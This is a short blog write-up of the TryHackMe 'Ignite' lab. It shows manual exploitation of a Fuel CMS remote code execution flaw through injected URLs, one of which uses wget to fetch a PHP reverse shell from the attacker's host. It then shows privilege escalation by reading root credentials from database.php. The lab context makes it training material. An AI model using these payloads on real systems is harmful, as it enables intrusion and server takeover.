Skip to content

TryHackMe – Ignite writeup without Metasploit

I know I always do hack the box writeup’s and I felt like I should do both tryhackme and hackthebox both. So here is my first Tryhackme writeup. It’s called ignite. It’s an easy one. Did it under one hour, Was fun and I learned something new. Nmap as usual.

The only port which was open is port 80. We have fuel cms. Don’t forget to read out the whole page, It gives out lot of information. Next would be to exploit it. I will be doing a manual exploitation so here it goes. Forgot to take a screenshot was too lazy to go back.

First of all http://10.10.40.254/fuel/pages/select/?filter='%2bpi(print(%24a%3d'system'))%2b%24a('uname -a')%2b'

There is an RCE in fuel cms and this is how we can check if it is actually exploitable. uname -a will print out the information we need. after executing that command you need to check the source code

Now we know that it’s exploitable. Let’s get a reverse shell in it fast. I took a php reverse shell edited it and then changed the exploit a bit. http://10.10.40.254/fuel/pages/select/?filter='%2bpi(print(%24a%3d'system'))%2b%24a('wget http://10.11.14.81/reverse.php -O shell.php')%2b' WAIT!!!! before firing up the exploit remember to setup python webserver and also netcat just to make sure you don’t forget it.

Now nevigate to the reverse shell. Hope you have already setup netcat http://10.10.40.254/shell.php

We have a shell!!!!! alright next is privilege escalation. Remember in the beginning I told you to read the website and before that I did try different methods to get root but couldn’t get it. So the last resort go back to the page and navigate to the folder /var/www/html/fuel/application/config from here cat database.php

Now we know root pass let’s see try to login

I hope everyone enjoyed this box as much as I did. You can follow me on twitter to get the latest updates https://twitter.com/far3y

Published inHackingOSCPtryhackme

Be First to Comment

Leave a Reply

Your email address will not be published. Required fields are marked *